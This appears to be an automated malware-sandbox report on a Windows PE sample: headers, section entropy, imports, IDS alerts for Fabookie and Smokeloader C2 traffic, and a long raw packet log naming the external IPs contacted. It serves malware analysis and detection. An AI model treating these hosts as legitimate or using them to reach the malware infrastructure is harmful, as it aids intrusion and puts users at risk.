                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x12800x1c.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39300x40.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x21c.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x1efb00x1f000False0.5132702242943549data6.363465614721737IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0x200000x16de000x12400False0.8686188998287672data7.516236861046921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0x18e0000x4bd80x4c00False0.7266652960526315data6.367523459296205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                  RT_ICON0x18e3100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Raeto-RomanceSwitzerland
                                                                                                                                  RT_ICON0x18ebb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Raeto-RomanceSwitzerland
                                                                                                                                  RT_ICON0x1911600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                                                                                                                  RT_STRING0x1924380x42dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_STRING0x1924800x1e6dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_STRING0x1926680x3c2dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_STRING0x192a300x1a4dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_ACCELERATOR0x1922380x90dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_GROUP_ICON0x1922080x30dataRaeto-RomanceSwitzerland
                                                                                                                                  RT_VERSION0x1922f80x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                                                                                                                                  None0x1922c80xadataRaeto-RomanceSwitzerland
                                                                                                                                  None0x1922d80xadataRaeto-RomanceSwitzerland
                                                                                                                                  None0x1922e80xadataRaeto-RomanceSwitzerland
                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllLoadLibraryA, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, VerLanguageNameA, LocalFlags, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeW, GetConsoleAliasExesLengthA, EnumSystemCodePagesA, FindNextFileA, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoA, LocalSize, DebugBreak, GlobalGetAtomNameA, MapViewOfFileEx, GetWindowsDirectoryA, DeleteFileA, lstrlenW, IsBadWritePtr, FindResourceA, GetComputerNameExW, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthA, DeleteVolumeMountPointW, GetOEMCP, CreateIoCompletionPort, CopyFileA, lstrcpynW, WriteConsoleW, GetCommandLineW, GetProfileSectionA, WriteConsoleOutputA, SearchPathA, GetCommandLineA, FindFirstChangeNotificationA, GetCalendarInfoA, GetConsoleTitleA, CreateActCtxA, FormatMessageW, GetModuleHandleW, CreateJobObjectA, GetConsoleFontSize, FindNextVolumeA, GlobalFlags, GetCurrentConsoleFont, GetModuleHandleA, LoadLibraryW, InitializeCriticalSection, GetStringTypeExA, OpenMutexA, RtlCaptureContext, InterlockedExchange, LeaveCriticalSection, DeleteFiber, InterlockedCompareExchange, EnumDateFormatsW, EnumCalendarInfoA, GetPrivateProfileStructA, InterlockedIncrement, GetNamedPipeHandleStateW, CreateTimerQueue, LocalAlloc, GetLogicalDriveStringsW, GetTickCount, SetLastError, WideCharToMultiByte, MultiByteToWideChar, Sleep, DeleteCriticalSection, EnterCriticalSection, RtlUnwind, RaiseException, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, MoveFileA, GetStartupInfoW, LCMapStringA, LCMapStringW, GetCPInfo, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, HeapSize, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, InitializeCriticalSectionAndSpinCount, SetFilePointer, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, FlushFileBuffers, ReadFile, CreateFileA, CloseHandle
                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  Raeto-RomanceSwitzerland
                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                  192.168.2.545.136.151.10249702802851115 10/17/22-22:07:06.666147TCP2851115ETPRO TROJAN Win32/Fabookie.ek CnC Activity M24970280192.168.2.545.136.151.102
                                                                                                                                  192.168.2.534.91.216.4949705802039103 10/17/22-22:07:11.143612TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970580192.168.2.534.91.216.49
                                                                                                                                  192.168.2.5104.21.93.3049692802039103 10/17/22-22:06:42.842374TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4969280192.168.2.5104.21.93.30
                                                                                                                                  192.168.2.5185.174.137.17449693802018581 10/17/22-22:06:30.526719TCP2018581ET TROJAN Single char EXE direct download likely trojan (multiple families)4969380192.168.2.5185.174.137.174
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 17, 2022 22:06:27.897016048 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:27.929425001 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:27.929560900 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:27.929771900 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:27.929794073 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:27.962079048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:27.962104082 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109186888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109220982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109239101 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109255075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109273911 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109291077 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109308958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109325886 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109344006 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109361887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109378099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109394073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.109431982 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.109503984 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.154829025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154860020 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154891014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154911995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154926062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154943943 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154962063 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.154983044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155000925 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155019045 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155030966 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155036926 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155054092 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155072927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155091047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155101061 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155107975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155128002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155145884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155145884 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155164957 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155167103 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155179024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155195951 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155209064 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155222893 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155226946 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155242920 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.155252934 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.155272007 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.196872950 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.199424028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199460983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199480057 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199498892 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199517012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199533939 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199553013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199573040 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199589968 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199604034 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.199645996 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.199733973 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200103998 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200126886 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200144053 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200160980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200179100 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200196981 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200212002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200238943 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200277090 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200484037 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200633049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200654984 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200673103 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200690985 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200709105 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200726032 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200747013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200752020 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200773954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200793982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200807095 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200818062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200839996 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200843096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200865030 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200881958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200901031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200918913 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200922966 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200946093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200965881 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.200965881 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.200989962 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.201005936 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.201013088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.201035976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.201086044 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.201219082 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.229244947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.229291916 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.229319096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.229346991 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.229367971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.229387999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.229414940 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.229440928 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.229440928 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.229466915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.229518890 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.246822119 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.246893883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.246931076 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.246964931 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.246993065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247020006 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247020960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247045994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247071028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247077942 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247097015 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247127056 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247153997 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247174978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247196913 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247225046 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247255087 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247281075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247298956 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247298956 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247298956 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247308016 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247334957 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247360945 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247386932 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247390032 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247390032 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247390985 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247410059 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247415066 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247442961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247453928 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247469902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247499943 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247529030 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247556925 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.247569084 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.247648001 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.251178980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251226902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251257896 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251286983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251317978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251328945 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.251346111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251372099 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.251374006 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251398087 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.251401901 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251415968 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.251430035 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251456976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251483917 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251499891 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.251513004 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251540899 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251569033 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251596928 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251626015 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251652002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.251734972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.251734972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.251734972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.251734972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.261909008 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.261943102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.262115002 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280035973 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280091047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280124903 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280154943 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280174971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280205011 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280235052 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280265093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280291080 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280293941 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280318022 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280342102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280349970 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280369997 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280390024 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280396938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280426025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280430079 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280452013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280478001 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280495882 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280508041 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280534983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280541897 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280564070 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280590057 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280591011 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280618906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280639887 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280644894 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280672073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280692101 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.280698061 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.280742884 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.284045935 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284085035 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284113884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284138918 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284152031 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.284164906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284189939 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284193039 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.284214973 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284238100 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.284243107 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284267902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284291983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284296036 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.284318924 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284327030 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.284343958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.284419060 CEST4969280192.168.2.5104.21.93.30
